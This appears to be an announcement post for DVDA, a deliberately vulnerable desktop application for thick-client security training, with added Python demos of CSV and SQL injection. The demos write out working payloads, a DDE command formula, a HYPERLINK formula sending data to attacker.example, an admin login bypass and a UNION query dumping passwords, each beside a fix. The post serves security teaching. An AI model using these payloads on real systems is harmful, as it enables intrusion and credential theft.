Introducing DVDA: Open-Source Training for Desktop App Security

News

Security training has a gap. Most courses, labs, and CTF challenges focus on web application vulnerabilities, and while that's valuable, it leaves an entire class of software largely unaddressed: thick client applications. These are native desktop apps, the kind widely used in finance, healthcare, and enterprise IT, and they carry many of the same vulnerabilities as web apps, plus a set of problems unique to how they're built and deployed.

DVDA (Damn Vulnerable Desktop Application) is an open-source training tool built to address this. It is a deliberately insecure C++/Qt6 desktop application with 15 security challenges covering the most common thick client vulnerability classes. 

What Is DVDA?

DVDA is a C++/Qt6 port of DVTA (Damn Vulnerable Thick Client Application), originally written in C#/.NET by @srini0x00. The port brings the same learning objectives to native C++ — a language that underlies a large share of real-world desktop software in security-sensitive environments.

The app simulates a simple expense tracker with login, registration, an admin panel, and data export functionality. Every feature is intentionally built with real security flaws, giving you a legal and controlled environment to find and exploit them.
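The data export feature is the natural home of the CSV Injection challenge in the list below: a thick client writes user-controlled text into a file that a spreadsheet later evaluates, so the payload runs on whoever opens the export, not inside the app. The following is an added illustration, not code from DVDA; the row layout, field names and payload strings are constructed for the example, and the check at the end can be run over any application's CSV output.

```python
"""Added example, not code from DVDA: a CSV export of expense rows that is
vulnerable to CSV (formula) injection, beside an export that neutralizes it.
Row shapes, field names and payload strings are constructed for illustration."""
import csv
import io

# A spreadsheet treats a cell starting with one of these as a formula when the
# exported file is opened, so attacker-controlled text here executes on the
# analyst's machine, not on the app that wrote the file.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows: two legitimate, two with attacker-chosen descriptions.
SAMPLE_EXPENSES = [
    {"description": "Train ticket", "amount": "42.00"},
    {"description": "Refund: lunch", "amount": "-12.50"},     # legitimate negative number
    {"description": "=cmd|' /C calc'!A0", "amount": "1.00"},  # DDE-style payload
    {"description": '+HYPERLINK("http://attacker.example/?"&A1,"Lunch")', "amount": "12.50"},
]


def is_number(cell: str) -> bool:
    try:
        float(cell)
        return True
    except ValueError:
        return False


def looks_like_formula(cell: str) -> bool:
    """Formula trigger characters, excluding genuine numbers such as '-12.50'."""
    return cell.startswith(FORMULA_PREFIXES) and not is_number(cell)


def export_vulnerable(rows) -> str:
    """Writes user-controlled fields straight into the file, formulas included."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["description", "amount"])
    for row in rows:
        writer.writerow([row["description"], row["amount"]])
    return buf.getvalue()


def neutralize_cell(cell: str) -> str:
    """Prefix formula-looking cells with an apostrophe so spreadsheets read them as text."""
    return "'" + cell if looks_like_formula(cell) else cell


def export_safe(rows) -> str:
    """Same export with every cell neutralized and force-quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n", quoting=csv.QUOTE_ALL)
    writer.writerow(["description", "amount"])
    for row in rows:
        writer.writerow([neutralize_cell(str(row["description"])),
                         neutralize_cell(str(row["amount"]))])
    return buf.getvalue()


def read_cells(csv_text: str):
    """Parse an export back into rows of cells, as a spreadsheet would."""
    return list(csv.reader(io.StringIO(csv_text)))


def formula_cells(csv_text: str):
    """Check to run on any export: the cells a spreadsheet would evaluate."""
    return [cell for row in read_cells(csv_text) for cell in row if looks_like_formula(cell)]


if __name__ == "__main__":
    print("vulnerable export evaluates:", formula_cells(export_vulnerable(SAMPLE_EXPENSES)))
    print("neutralized export evaluates:", formula_cells(export_safe(SAMPLE_EXPENSES)))
```

The apostrophe prefix is the standard mitigation on the output side; it is visible in some spreadsheet tools, which is why the numeric check is there, so a legitimate refund of -12.50 is not turned into text. Rejecting formula-leading descriptions at registration and input time is the complementary fix, since the export is rarely the only consumer of that field.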

The 15 Security Challenges

Each challenge is mapped to an OWASP category and assigned a difficulty rating. They can be tackled in any order.

Configuration File Exposure  |  OWASP A05  |  Easy

SQL Injection — Authentication Bypass  |  OWASP A03  |  Easy

SQL Injection — Registration  |  OWASP A03  |  Easy

SQL Injection — Data Exfiltration  |  OWASP A03  |  Medium

Insecure Local Data Storage  |  OWASP A02  |  Easy

Insecure Logging  |  OWASP A09  |  Easy

Weak Cryptography & Exposed Keys  |  OWASP A02  |  Medium

CSV Injection  |  OWASP A03  |  Medium

Sensitive Data in Memory  |  OWASP A02  |  Hard

DLL / Dylib / SO Hijacking  |  OWASP A08  |  Medium

Hardcoded Credentials  |  OWASP A07  |  Easy

Cleartext Data in Transit  |  OWASP A02  |  Medium

Debugger Detection Bypass  |  OWASP A04  |  Medium

Plaintext Passwords in Database  |  OWASP A02  |  Easy

Reverse Engineering — No Obfuscation  |  OWASP A04  |  Medium
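The three SQL injection challenges above (authentication bypass, registration, data exfiltration) share one defect: a query assembled from strings, so the user controls SQL syntax rather than just values. The following added example, which is not DVDA's code, shows the bypass and the UNION-based exfiltration against an in-memory SQLite database, the same engine a thick client typically ships with for local storage, beside the parameterized versions that defeat them. Table layout, accounts and passwords are constructed assumptions; the plaintext passwords are deliberate, because that is what makes the exfiltrated rows immediately usable.

```python
"""Added example, not code from DVDA: SQL injection authentication bypass and
data exfiltration against a local SQLite store, beside parameterized fixes.
Table layout, accounts and passwords below are constructed assumptions."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed local store. Passwords are plaintext on purpose, as in the
    'Plaintext Passwords in Database' challenge."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'Sup3rS3cret!', 'admin'),
            ('alice', 'hunter2', 'user');
        CREATE TABLE expenses (id INTEGER PRIMARY KEY, owner TEXT, description TEXT, amount REAL);
        INSERT INTO expenses (owner, description, amount) VALUES
            ('alice', 'Train ticket', 42.0),
            ('alice', 'Lunch', 12.5);
        """
    )
    return con


def login_vulnerable(con, username: str, password: str):
    """Concatenated query: the caller controls SQL syntax, not just values."""
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return con.execute(query).fetchone()


def login_safe(con, username: str, password: str):
    """Parameterized query: the same input is bound as data and stays data."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone()


def search_vulnerable(con, owner: str, term: str):
    """Expense search built by concatenation: the exfiltration variant."""
    query = (
        "SELECT description, amount FROM expenses WHERE owner = '" + owner
        + "' AND description LIKE '%" + term + "%'"
    )
    return con.execute(query).fetchall()


def search_safe(con, owner: str, term: str):
    """The wildcard pattern is built in Python and bound as one parameter."""
    query = "SELECT description, amount FROM expenses WHERE owner = ? AND description LIKE ?"
    return con.execute(query, (owner, "%" + term + "%")).fetchall()


# Constructed payloads, the shape you would type into the login and search boxes.
BYPASS_USERNAME = "admin' --"   # closes the string literal, comments out the password check
EXFIL_TERM = "' UNION SELECT username, password FROM users --"


def run_demo() -> dict:
    con = make_db()
    return {
        "bypass_vulnerable": login_vulnerable(con, BYPASS_USERNAME, "wrong"),
        "bypass_safe": login_safe(con, BYPASS_USERNAME, "wrong"),
        "exfil_vulnerable": search_vulnerable(con, "alice", EXFIL_TERM),
        "exfil_safe": search_safe(con, "alice", EXFIL_TERM),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

In a Qt client the equivalent fix is QSqlQuery::prepare with bound values instead of QString concatenation; the registration variant is the same defect on an INSERT and gets the same fix. Because the local database is a plain file, confirm what the injection exposed by opening it with sqlite3 afterwards rather than trusting the app's own view of the data.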

Why Thick Client Security Matters

Thick client applications handle sensitive data and operate with elevated trust in ways that make vulnerabilities particularly dangerous. A few reasons they deserve more attention:

  • They often store credentials, tokens, or encryption keys locally — on disk, in memory, or in config files.
  • Network traffic is not always routed through a proxy, making interception less obvious than with web apps.
  • Native binaries can be reverse engineered to expose hardcoded secrets, business logic, and authentication mechanisms.
  • DLL and shared library hijacking can allow local privilege escalation or code execution.
  • Many thick clients connect directly to databases or internal APIs, making injection vulnerabilities high-impact.

These are not edge cases. They appear regularly in real-world thick client assessments across trading platforms, healthcare software, enterprise tooling, and more.

Getting Started

Prerequisites by platform:

  • macOS: brew install qt cmake openssl
  • Linux: apt install qt6-base-dev cmake libssl-dev g++
  • Windows: Qt6, CMake, OpenSSL via the Qt installer + MSVC or MinGW

Build and run natively:

git clone https://github.com/FWDSEC/dvda.git
cd dvda
mkdir build && cd build
cmake ..
cmake --build .
./dvda

Run via Docker (Linux):

docker build -t dvda .
docker run --rm dvda

Recommended Tools

The following tools are useful across the challenges:

Ghidra / radare2 — reverse engineering and disassembly

sqlite3 — inspect the local database

strings / nm — static binary analysis

lldb / gdb — runtime debugging and memory inspection

Wireshark / tcpdump — capture and analyze network traffic


For questions, contact us at info@forwardsecurity.com.